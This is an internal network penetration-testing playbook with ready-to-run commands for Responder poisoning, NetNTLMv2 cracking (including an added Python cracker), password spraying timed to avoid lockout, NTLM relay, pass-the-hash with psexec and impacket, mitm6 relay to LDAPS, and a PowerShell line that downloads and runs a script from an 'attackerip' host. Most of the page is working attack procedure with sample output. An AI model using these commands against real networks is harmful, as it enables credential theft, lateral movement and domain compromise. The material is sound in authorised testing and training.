Basic Internal Network test

Slightly less than the minimum standard

Host Discovery

Nmap Ping Scan Private Ranges and start responder

# Start Responder in a second terminal before scanning so it catches the
# LLMNR/NBT-NS/mDNS broadcasts the sweeps provoke (-I, capital i, is the interface flag)
responder -I eth0
# The three RFC 1918 private ranges; -sn = ping sweep only, -n = no DNS resolution
nmap -sn -n 10.0.0.0/8 | tee -a Targets.tmp
nmap -sn -n 172.16.0.0/12 | tee -a Targets.tmp
nmap -sn -n 192.168.0.0/16 | tee -a Targets.tmp
# Loud so only use if required: at this rate masscan will saturate the link
masscan -p80,445,22 --rate 100000000 10.0.0.0/8 | tee -a Targets.tmp
masscan -p80,445,22 --rate 100000000 172.16.0.0/12 | tee -a Targets.tmp
masscan -p80,445,22 --rate 100000000 192.168.0.0/16 | tee -a Targets.tmp
# Note down IP addresses from responder: any host that received a poisoned answer is live.
# The log line reads "... Poisoned answer sent to <ip> for name <name>", so pull the
# address out by pattern rather than by column number.
grep answer /usr/share/responder/logs/Responder-Session.log | grep -oE '[0-9]{1,3}(\.[0-9]{1,3}){3}' | sort -u | tee -a Targets.tmp
# Note current IP address & scan range, then quick top-10 port scan of the local subnet
ip -o -4 addr show eth0
nmap --top-ports 10 -Pn --open $(ip -o -4 addr show eth0 | awk '{print $4}') | tee -a Targets.tmp
# ARP sweep of the local segment (-P prints parseable output)
netdiscover -i eth0 -P

Now grep the IP addresses out of Targets.tmp (it is a mix of nmap, masscan, Responder and netdiscover output), drop your own address, sort them uniquely and save the result as Targets.txt.
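One way to do that consolidation step, as an added example (not code from the original page): every IPv4 address is pulled out of Targets.tmp by pattern, validated, de-duplicated, stripped of our own address and of broadcast/reserved noise, and sorted numerically so the list reads in subnet order. SAMPLE_TMP is constructed to look like the mixture of tool output that lands in Targets.tmp; it is not a real scan.

```python
"""Consolidate Targets.tmp into Targets.txt (added example, not the page's own code)."""
import ipaddress
import re
import sys

# Dotted quad not glued to more digits/dots (so "7.2.1.1.2" style version strings don't match)
IPV4_RE = re.compile(r"(?<![\d.])(\d{1,3}(?:\.\d{1,3}){3})(?![\d.])")

# Constructed sample in the shape of nmap -sn, masscan, Responder-log and netdiscover -P lines
SAMPLE_TMP = """\
Nmap scan report for 192.168.1.1
Host is up (0.0012s latency).
Nmap scan report for 192.168.1.20
Discovered open port 445/tcp on 192.168.1.30
Discovered open port 80/tcp on 192.168.1.5
192.168.1.5
192.168.1.99
 192.168.1.250   00:11:22:33:44:55      1      60  Unknown vendor
Nmap scan report for 255.255.255.255
bogus 999.1.1.1 never matches a real address
"""


def extract_targets(text, own_ips=()):
    """Return sorted, unique, routable IPv4 strings found in text, minus our own addresses."""
    own = {ipaddress.IPv4Address(ip) for ip in own_ips}
    found = set()
    for m in IPV4_RE.finditer(text):
        try:
            ip = ipaddress.IPv4Address(m.group(1))
        except ValueError:  # an octet over 255
            continue
        # broadcast (255.255.255.255) is in the reserved 240/4 block; loopback/multicast are noise
        if ip in own or ip.is_loopback or ip.is_multicast or ip.is_reserved or ip.is_unspecified:
            continue
        found.add(ip)
    return [str(ip) for ip in sorted(found)]


def local_ips(ip_addr_output):
    """Parse our own addresses out of `ip -o -4 addr show` output so they can be excluded."""
    return [cidr.split("/")[0] for cidr in re.findall(r"inet (\d+\.\d+\.\d+\.\d+/\d+)", ip_addr_output)]


if __name__ == "__main__":
    src = sys.argv[1] if len(sys.argv) > 1 else "Targets.tmp"
    mine = sys.argv[2:]  # our own addresses, e.g. the output of `hostname -I`
    targets = extract_targets(open(src).read(), mine)
    with open("Targets.txt", "w") as fh:
        fh.write("\n".join(targets) + "\n")
    print("%d targets written to Targets.txt" % len(targets))
```

Run it as `python3 consolidate.py Targets.tmp $(hostname -I)` (script name assumed) and Targets.txt is ready for the per-service scans that follow.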

Nmap Scans

mkdir Scans
# One scan per service so each output file is a clean host list: -n skips DNS,
# --open keeps only hosts with the port open, -iL reads the Targets.txt built above
for svc in ftp:21 ssh:22 telnet:23 http:80 https:443 smb:445 rdp:3389; do
    name=${svc%%:*}; port=${svc##*:}
    nmap -p $port -n --open -iL Targets.txt -oA Scans/$name
    # "Nmap scan report for <ip>" lines -> bare IP list, e.g. ftphosts.txt, smbhosts.txt
    grep 'Nmap scan report for' Scans/$name.nmap | cut -d " " -f 5 > ${name}hosts.txt
done


Start Nessus on discovered IP addresses

In parallel, run the scanner loop below against everything in Targets.txt.

If it is running slowly (thousands of hosts), reduce the number of ports it looks at (the --top-ports values).

#!/bin/bash
# Per-host scanner: every command appends to Scanner.log, and each host also gets its
# own numbered output files (the do/done keywords were missing from the original loops)
for Target in $(cat Targets.txt); do
    echo "---------------------------------------------------------------" | tee -a Scanner.log
    echo "Auto Scanner" | tee -a Scanner.log
    echo "$Target - Scanned: $(date)" | tee -a Scanner.log
    echo "---------------------------------------------------------------" | tee -a Scanner.log
    echo "" | tee -a Scanner.log
    echo "---------------------------------------------------------------" | tee -a Scanner.log
    echo "TCP Scan Started: $(date)" | tee -a Scanner.log
    echo "---------------------------------------------------------------" | tee -a Scanner.log
    # -sSVC = SYN scan + version detection + default scripts; -oA also writes the .xml
    # that EyeWitness consumes later
    nmap -Pn -sSVC -O --top-ports 1000 -oA $Target-01-NmapTCP $Target | tee -a Scanner.log
    echo "---------------------------------------------------------------" | tee -a Scanner.log
    echo "UDP Scan Started: $(date)" | tee -a Scanner.log
    echo "---------------------------------------------------------------" | tee -a Scanner.log
    # UDP is slow: --top-ports 200 is the thorough variant, 10 the quick one
    #nmap -Pn -sUV -sC --top-ports 200 -oA $Target-02-NmapUDP $Target | tee -a Scanner.log
    nmap -Pn -sUV -sC --top-ports 10 -oA $Target-02-NmapUDP $Target | tee -a Scanner.log
    echo "---------------------------------------------------------------" | tee -a Scanner.log
    echo "Nikto Scan Started: $(date)" | tee -a Scanner.log
    echo "---------------------------------------------------------------" | tee -a Scanner.log
    nikto -p 80,443,8000,8080 -h $Target | tee $Target-03-Nikto.txt | tee -a Scanner.log
    echo "---------------------------------------------------------------" | tee -a Scanner.log
    echo "SSL Scan Started: $(date)" | tee -a Scanner.log
    echo "---------------------------------------------------------------" | tee -a Scanner.log
    sslscan --show-certificate --no-colour $Target | tee $Target-04-SSLScan.txt | tee -a Scanner.log
    echo "---------------------------------------------------------------" | tee -a Scanner.log
    echo "Directory Scan Started: $(date)" | tee -a Scanner.log
    echo "---------------------------------------------------------------" | tee -a Scanner.log
    # gobuster 3.x needs the "dir" subcommand; -k skips TLS certificate validation
    gobuster dir -u http://$Target/ -w /root/Data/Tools/Wordlists/Dirbuster/Fast.txt -q -e -t 10 | tee -a $Target-05-Directories.txt | tee -a Scanner.log
    gobuster dir -k -u https://$Target/ -w /root/Data/Tools/Wordlists/Dirbuster/Fast.txt -q -e -t 10 | tee -a $Target-05-Directories.txt | tee -a Scanner.log
done

# Second pass: collect every open port into one host:port services list
for Target in $(cat Targets.txt); do
    grep /tcp $Target-01-NmapTCP.nmap | grep open > "$Target"_Ports.txt 2> /dev/null
    # UDP reports "open|filtered" for silent ports; keep only definite opens
    grep /udp $Target-02-NmapUDP.nmap | grep open | grep -v filtered >> "$Target"_Ports.txt 2> /dev/null
    while IFS= read -r port; do
        echo "$Target":"$port" >> ServicesList.txt
    done < "$Target"_Ports.txt
    rm "$Target"_Ports.txt
done
echo "---------------------------------------------------------------" | tee -a Scanner.log
echo "The following services were found:" | tee -a Scanner.log
echo "---------------------------------------------------------------" | tee -a Scanner.log
cat ServicesList.txt | tee -a Scanner.log

Check responder for hashes and crack with hashcat

# -m 5600 = NetNTLMv2 in the form Responder logs it (user::domain:challenge:response:blob).
# Do not mask GPU driver warnings with --force; fix the driver instead.
hashcat -m 5600 Hashes.txt /path/to/wordlist -r /path/to/rules

Once you have some hashes, try several wordlists. If none of them crack anything, scrape the client's website for words with cewl (-d 5 = crawl depth, -m 8 = minimum word length):

cewl -w clientwordlist.txt -d 5 -m 8 <client website URL>

Then repeat the cracking process against clientwordlist.txt with a good rule list.
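What hashcat -m 5600 actually checks, as an added example (not code from the original page). A Responder capture line has the form `user::DOMAIN:<server challenge hex>:<NTProofStr hex>:<blob hex>`, and a candidate password is right when NTProofStr equals HMAC-MD5 over (challenge || blob) keyed with HMAC-MD5(NT-hash, UTF-16LE(UPPER(user) + DOMAIN)), where NT-hash = MD4(UTF-16LE(password)). MD4 is written out because hashlib on OpenSSL 3 builds often refuses it. SAMPLE_LINE is constructed from the page's own example password; it is not a real capture, the challenge and blob bytes are arbitrary, and the 8846f7... NT hash asserted on is the one that appears on this page in the psexec hash pair.

```python
"""NetNTLMv2 (hashcat mode 5600) verifier and capture-file de-duplicator (added example)."""
import hashlib
import hmac
import struct

MASK = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4: three rounds of sixteen steps over each 512-bit block."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & MASK
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (
        (F, 0x00000000, (3, 7, 11, 19), range(16)),
        (G, 0x5A827999, (3, 5, 9, 13), (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)),
        (H, 0x6ED9EBA1, (3, 9, 11, 15), (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)),
    )
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for fn, k, shifts, order in rounds:
            for i, idx in enumerate(order):
                a = rotl((a + fn(b, c, d) + X[idx] + k) & MASK, shifts[i % 4])
                a, b, c, d = d, a, b, c  # rotate so the next step updates the next word
        h = [(x + y) & MASK for x, y in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def nt_hash(password: str) -> bytes:
    return md4(password.encode("utf-16le"))


def ntlmv2_proof(password, user, domain, server_challenge, blob):
    """NTProofStr for this user/domain/challenge/blob under the candidate password."""
    v2_key = hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16le"), hashlib.md5).digest()
    return hmac.new(v2_key, server_challenge + blob, hashlib.md5).digest()


def parse_line(line):
    user, _, domain, chal, proof, blob = line.strip().split(":")
    return user, domain, bytes.fromhex(chal), bytes.fromhex(proof), bytes.fromhex(blob)


def crack(line, candidates):
    """Return the first candidate whose NTProofStr matches the capture, or None."""
    user, domain, chal, proof, blob = parse_line(line)
    for pw in candidates:
        if hmac.compare_digest(ntlmv2_proof(pw, user, domain, chal, blob), proof):
            return pw
    return None


def one_per_account(lines):
    """Responder logs a line per poisoned request; hashcat only needs one per account."""
    seen, kept = set(), []
    for ln in lines:
        parts = ln.strip().split(":")
        if len(parts) != 6:
            continue
        key = (parts[0].lower(), parts[2].lower())
        if key not in seen:
            seen.add(key)
            kept.append(ln.strip())
    return kept


def build_line(user, domain, password, server_challenge, blob):
    """Build a capture line in Responder's format (used here only to construct the sample)."""
    proof = ntlmv2_proof(password, user, domain, server_challenge, blob)
    return "%s::%s:%s:%s:%s" % (user, domain, server_challenge.hex(), proof.hex(), blob.hex())


CHALLENGE = bytes.fromhex("1122334455667788")          # constructed
BLOB = bytes.fromhex("0101000000000000" + "aa" * 24)   # constructed, not a real NTLMv2 blob
SAMPLE_LINE = build_line("jsmith", "CORP", "Password 2018!", CHALLENGE, BLOB)

if __name__ == "__main__":
    print(SAMPLE_LINE)
    print(crack(SAMPLE_LINE, ["Winter2018", "Password 2018!"]))
```

Feed hashcat the output of one_per_account rather than the raw Responder log: duplicate captures of the same account only multiply the work without adding a single new password.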

Domain enumeration

Get DC List

# Windows command
nltest /DCLIST:domain.local
# Linux commands: the DNS servers in resolv.conf are usually the DCs
cat /etc/resolv.conf
# Kerberos (88) together with LDAP/LDAPS (389/636) means a domain controller
nmap -p 88,389,636 -iL Targets.txt --open
# Reverse-resolve the targets and look for hostnames containing "dc"
for i in $(cat Targets.txt); do nslookup $i | grep -i "dc"; done
# Or ask DNS directly: the bare domain name resolves to every DC's address
nslookup
> set type=all
> domain.local

Get user list

# A null session may work on older DCs; otherwise supply domain credentials
rpcclient -U 'domain\username' <DC IP>
rpcclient $> enumdomusers

Copy the output (one "user:[name] rid:[0x...]" line per account) to a file called rpcuserlist.txt and extract the sorted names:

cut -d "[" -f 2 rpcuserlist.txt | cut -d "]" -f 1 | sort -u > DomainUsers.txt

Password spray domain users

One password against every user per round. Set a timer and rerun the round every 30 minutes: the default AD lockout observation window ("Reset account lockout counter after") is 30 minutes, after which the bad-password count resets, so one attempt per window never reaches the lockout threshold.

Check the password lockout policy with the client first if in a sensitive environment (a threshold of 1 locks out every user on the first round).

msfconsole -q
use auxiliary/scanner/smb/smb_login
set RHOSTS domaincontrollerip
set SMBDomain domain
set USER_FILE DomainUsers.txt
set SMBPass firstpassword
run
date    # note the time so the next round starts only after the window has passed

When time is up change SMBPass to the next password and rerun.

Passwords to try:

Password 2018!

Find open file servers

Find open SMB shares which are available unauthenticated (null session):

for i in $(cat Targets.txt); do smbmap -H $i; done | tee -a SMBMap-Output.txt

Find open writable shares and search for authenticated file servers, using a sprayed or cracked domain account:

for i in $(cat Targets.txt); do smbmap -u 'username' -p 'password' -d 'domain' -H $i; done | tee -a SMBMap-Output.txt
leafpad SMBMap-Output.txt
# ctrl + f WRITE (search for writable folders: "READ, WRITE" in the Permissions column)


Screenshot every discovered web service with EyeWitness. The -x option takes nmap XML, so the TCP scan feeding it must have been written with -oX or -oA:

python /root/Data/Tools/EyeWitness/EyeWitness.py --all-protocols -x NmapTCP.xml

NTLM Relay

Modify Responder.conf to turn off the HTTP and SMB servers, so that ntlmrelayx can bind ports 80 and 445 and relay the incoming authentication instead of Responder merely capturing it:

[Responder Core]
; Servers to start
SQL = On
SMB = Off        ; turned off: ntlmrelayx takes 445
Kerberos = On
FTP = On
POP = On
HTTP = Off       ; turned off: ntlmrelayx takes 80
DNS = On

Start responder (-w starts the rogue WPAD proxy; check `responder -h` for what -r and -d do in your version, as -d changed meaning between releases):

responder -I <interface> -r -d -w

Create a list of targets with SMB signing disabled (relaying only works where the server does not require signing):

nmap -n -p 137,139,445 --script=smb-security-mode -iL Targets.txt -oA Scans/smbsigning | grep disabled -B 15 | grep for | cut -d " " -f 5 | tee -a smbsigningdisabled.txt
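A more robust way to build that target list, as an added example (not code from the original page). It reads the nmap XML rather than scraping the text with `grep -B 15`, which can attach the wrong host line when two results sit close together. It assumes the scan was written with -oX/-oA (the path Scans/smbsigning.xml is an assumption), and it goes slightly beyond the page's grep: hosts reporting "supported" (signing enabled but not required) are kept as well as "disabled", since both accept an unsigned relayed session. SAMPLE_XML is constructed in the shape nmap writes for the smb-security-mode script; it is not a real scan.

```python
"""Relay-target selection from nmap XML (added example, not the page's own code)."""
import re
import sys
import xml.etree.ElementTree as ET

# Constructed sample: structured <elem> output for two hosts, text-only output for a
# third, and a host the script produced nothing for
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun>
 <host><status state="up"/><address addr="10.0.0.5" addrtype="ipv4"/>
  <hostscript><script id="smb-security-mode" output="...">
   <elem key="account_used">guest</elem>
   <elem key="authentication_level">user</elem>
   <elem key="challenge_response">supported</elem>
   <elem key="message_signing">disabled (dangerous, but default)</elem>
  </script></hostscript></host>
 <host><status state="up"/><address addr="10.0.0.10" addrtype="ipv4"/>
  <hostscript><script id="smb-security-mode" output="...">
   <elem key="message_signing">required</elem>
  </script></hostscript></host>
 <host><status state="up"/><address addr="10.0.0.11" addrtype="ipv4"/>
  <hostscript><script id="smb-security-mode" output="  message_signing: supported"/>
  </hostscript></host>
 <host><status state="up"/><address addr="10.0.0.12" addrtype="ipv4"/></host>
</nmaprun>
"""

RELAYABLE = ("disabled", "supported")   # anything but "required" accepts unsigned sessions


def signing_state(script):
    """message_signing value of one <script> element: structured <elem> first,
    then the plain-text output attribute as a fallback."""
    for elem in script.iter("elem"):
        if elem.get("key") == "message_signing":
            return elem.text.split()[0] if elem.text else None
    m = re.search(r"message_signing:\s*(\S+)", script.get("output", ""))
    return m.group(1) if m else None


def relay_targets(xml_text):
    """Map IPv4 -> signing state for every host whose SMB signing is not required."""
    targets = {}
    for host in ET.fromstring(xml_text).iter("host"):
        addr = next((a.get("addr") for a in host.findall("address") if a.get("addrtype") == "ipv4"), None)
        if addr is None:
            continue
        for script in host.iter("script"):
            if script.get("id") != "smb-security-mode":
                continue
            state = signing_state(script)
            if state in RELAYABLE:
                targets[addr] = state
    return targets


def write_target_file(targets, path):
    """One address per line, in numeric order, ready for ntlmrelayx -tf."""
    with open(path, "w") as fh:
        for ip in sorted(targets, key=lambda s: tuple(int(o) for o in s.split("."))):
            fh.write(ip + "\n")


if __name__ == "__main__":
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_XML
    found = relay_targets(text)
    write_target_file(found, "smbsigningdisabled.txt")
    for ip, state in found.items():
        print(ip, state)
```

Run it as `python3 relaytargets.py Scans/smbsigning.xml` (script name assumed) and it writes the same smbsigningdisabled.txt the grep pipeline produces, with the "supported" hosts included.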

Now start ntlmrelayx against the targets (it listens on 445 and 80 and relays each incoming authentication to the hosts in the list in turn):

python /usr/share/doc/python-impacket/examples/ntlmrelayx.py -tf smbsigningdisabled.txt

If the relayed account is a local administrator on the target, ntlmrelayx dumps the SAM hashes (LM:NT per account) from that system.

Now use psexec within metasploit to log in to the target with the dumped hash, no cracking needed:

use exploit/windows/smb/psexec
set LHOST <attacker IP>
set RHOST <target IP>
set SMBUser Administrator
set SMBPass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c
run

Pass the hash

With an LM:NT pair from the relay dump (the NT half is what matters), authenticate to other hosts without cracking it. The pth-toolkit wrappers take the hash in place of the password after the % sign; impacket's examples take it via -hashes.

pth-winexe -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //<target> cmd.exe
# Where WORKGROUP is the default workgroup. Can be replaced by a domain name
# Administrator: account's name
# aad3b435b51404eeaad3b435b51404ee: empty LM hash
# C0F2E311D3F450A7FF2571BB59FBEDE5: NTLM hash
E_md4hash wrapper called.
HASH PASS: Substituting user supplied NTLM HASH...
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
# WMI queries and commands with the same hash
pth-wmic -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //<target> "select Name from Win32_UserAccount"
pth-wmis -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //<target> "cmd.exe /c whoami > c:\temp\result.txt"
# File shares and RPC
pth-smbclient -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //<target>/C$
pth-rpcclient -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //<target>
# Impacket takes the same LM:NT pair via -hashes (wmiexec.py and smbexec.py both print the banner below)
python <impacket example>.py -hashes aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 Administrator@<target>
Impacket v0.9.15 - Copyright 2002-2016 Core Security Technologies
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
# RDP with the hash only works where the server has Restricted Admin mode enabled
apt-get update
apt-get install freerdp-x11
xfreerdp /u:richard /d:workgroup /pth:C0F2E311D3F450A7FF2571BB59FBEDE5 /v:<target>
# Metasploit psexec with the hash (the module that yields the Meterpreter session below)
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set SMBPass aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5
msf exploit(psexec) > set SMBUser Administrator
msf exploit(psexec) > set SMBDomain WORKGROUP
msf exploit(psexec) > set RHOST <target>
msf exploit(psexec) > run
[*] Started reverse TCP handler on <attacker IP>:<port>
[*] <target>:445 - Connecting to the server...
[*] <target>:445 - Authenticating to <target>:445|WORKGROUP as user 'administrator'...
[*] <target>:445 - Selecting PowerShell target
[*] <target>:445 - Executing the payload...
[+] <target>:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (957999 bytes) to <target>
[*] Meterpreter session 1 opened (<attacker IP>:<port> -> <target>:<port>) at 2017-04-05 22:48:15 +0200
meterpreter > exit

The relay dumps the local hashes whenever the relayed account is an administrator on the target; a domain admin's NTLM authentication is the usual case.

Once you have such a hash, log in to the machine with Metasploit's psexec pass-the-hash or with one of the pth-toolkit / impacket commands above.


Once on the domain as a windows user run one of the following (either will do: the PowerShell ingestor runs in memory, the .exe is dropped to disk and executed):

powershell -nop -exec bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://attackerip/BloodHound.ps1'); Invoke-BloodHound -CollectionMethod All"
powershell -nop -exec bypass -c "(New-Object Net.WebClient).DownloadFile('http://attackerip/SharpHound.exe', 'SharpHound.exe'); .\SharpHound.exe -c All"

Once the enumeration has finished, upload the csv files it wrote to your attacker machine.

Once on your attacker machine make sure you have bloodhound installed and then execute:

neo4j console

Start the BloodHound client, enter your neo4j password and upload the csv files you extracted from the target.

Click queries and then "Find Shortest Paths to Domain Admins".


git clone <mitm6 repository URL>
cd mitm6
# Answer DHCPv6 requests so hosts take us as their IPv6 DNS server for the domain
mitm6 -d domain.local

In a new window, relay the captured authentications to LDAPS on the DC (-6 listens on IPv6, -wh serves the fake WPAD host, -l writes the loot into the data directory):

ntlmrelayx.py -6 -t ldaps://domaincontrollerip -wh fakewpad.domain.local -l data

Wait 30 mins to an hour: Windows hosts only pick up the attacker's IPv6 DNS server when they periodically renew their DHCPv6 configuration, and only then do they resolve WPAD through mitm6.

cd data
firefox domain_users_by_group.html

Review the output. If a domain admin authenticates over the relay, ntlmrelayx uses the LDAP session to create a new privileged user and prints its name and password; look for that in the ntlmrelayx window.